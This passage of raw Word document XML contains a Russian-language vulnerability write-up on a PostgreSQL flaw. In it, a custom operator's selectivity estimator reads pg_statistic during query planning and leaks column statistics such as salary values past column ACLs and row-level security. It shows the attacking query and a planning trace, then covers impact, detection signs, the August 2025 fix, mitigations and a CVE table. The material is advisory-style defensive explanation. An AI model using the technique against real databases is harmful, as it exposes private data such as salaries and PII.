        <w:t xml:space="preserve">Шаг 3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — атакующий выполняет query с этим operator:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- В WHERE использовать @@@ против target колонки</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT count(*) FROM app.salaries WHERE annual_salary @@@ 100000;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">При planning этой query:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1. PostgreSQL вызывает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">leaky_estimator(annual_salary)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для оценки selectivity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">leaky_estimator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> через optimizer-API получает доступ к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_statistic entries для колонки annual_salary</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3.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для этой колонки содержит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">actual salary values</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — атакующий читает их.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Финальный execute query применяет ACL/RLS и возвращает 0 rows (атакующий не видит salary). Но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">статистики уже leaked в planning phase</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(planning trace):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- planning:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">--   Custom operator @@@(numeric, numeric)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">--   restriction selectivity → attacker.leaky_estimator(...)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">--   ↑ читает pg_statistic for app.salaries.annual_salary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">--   ↑ возвращает selectivity (любое значение), но в side-effect — leaks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- execution:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">--   Seq Scan with ACL check / RLS filter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">--   → 0 rows (атакующий не имеет прав)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Leak target: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обычно top 100 most frequent values per column (зависит от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">default_statistics_target</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> GUC). Для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">annual_salary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> это top 100 salary amounts в company — sensitive information disclosure.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Information disclosure of statistics-sampled data из чужих columns. Не full table read, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">leak of representative values</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — для PII (emails, phone numbers, addresses), salaries, financial data, или patterns (e.g., наиболее часто встречающиеся password hashes если они таблично хранятся). Severity зависит от какие columns в БД содержат sensitive data и попадают в statistics-sample.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE advisory wording: *"Custom operators with arbitrary side-effects in their estimator functions could bypass view ACL and RLS through optimizer statistics."*</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с language C от user-роли — критичный red flag (требует superuser для C-функций; альтернативно — plpgsql с side-channels).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pg_operator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: новые operators в user-schemas, особенно с custom restrict/join functions.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queries использующие unusual operators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custom symbols) против tables со sensitive columns.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Application logs: queries формально returning 0 rows, но execution time anomalously high (planning side-channel).</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PostgreSQL planner вызывает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">restrict-selectivity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">join-selectivity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> estimator-functions для custom operators при building query plan. Эти estimators имеют доступ к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">internal optimizer API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, который включает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">get_attstatsslot()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pg_statistic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> reads.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Optimizer reads statistics </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">до executor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, до применения ACL и RLS. По дизайну это OK: planner оптимизирует план, statistics — internal information для cost estimation. Bug в том, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">custom estimator может exfiltrate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sampled data через side-effects (writing к file, generating timing differences, embedding в error message).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PostgreSQL до фикса не </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">restricted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> custom estimators от accessing statistics of columns user doesn't have SELECT permission on. Фикс — добавил проверку: при reading </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_statistic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> через optimizer-API, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">applied ownership check</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (column owner или SELECT permission required).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Точный механизм фикса в release notes 17.6 (август 2025): *"Restrict reading of pg_statistic entries to columns owner or with SELECT permission."*</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Защита — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">upgrade на patched PG-версию</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Mitigations для непатченных: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Не давать CREATE на schemas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> обычным пользователям (PG 15+ default для public — already revoked).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Audit `pg_operator`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> на новые operators в user-schemas.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на functions с LANGUAGE C от non-DBA (хотя creating C-funcs всё равно требует superuser).</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 17.5, 16.9, 15.13, 14.18, 13.21 (фикс 14.08.2025).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CREATE на schema + CREATE OPERATOR/FUNCTION privileges. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Не superuser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для basic exploit; superuser для C-language functions.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sensitive columns в БД с ACL restrictions ИЛИ RLS policies + atttribute-statistics enabled (default).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Side-channel для leakage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: required (timing, error message, или log-based).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-блок.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Поле</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CVSS 3.1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 указан в advisory; GBHackers оценивает как Medium)</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Опубликовано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августа 2025</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Затронуто</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 17.5, 16.9, 15.13, 14.18, 13.21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Фикс</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17.6, 16.10, 15.14, 14.19, 13.22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Тип</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Custom operator estimator bypass column ACL / RLS через optimizer statistics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Категория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Information disclosure через side-channel в planning phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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Custom operators — стандартный extension mechanism PostgreSQL. Many extensions create them legitimately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для similarity, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pgvector</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для embedding, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">postgis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для spatial). Estimator-functions для cost estimation — accepted pattern.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Legitimate использование </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не leaks statistics</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — стандартные estimators (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
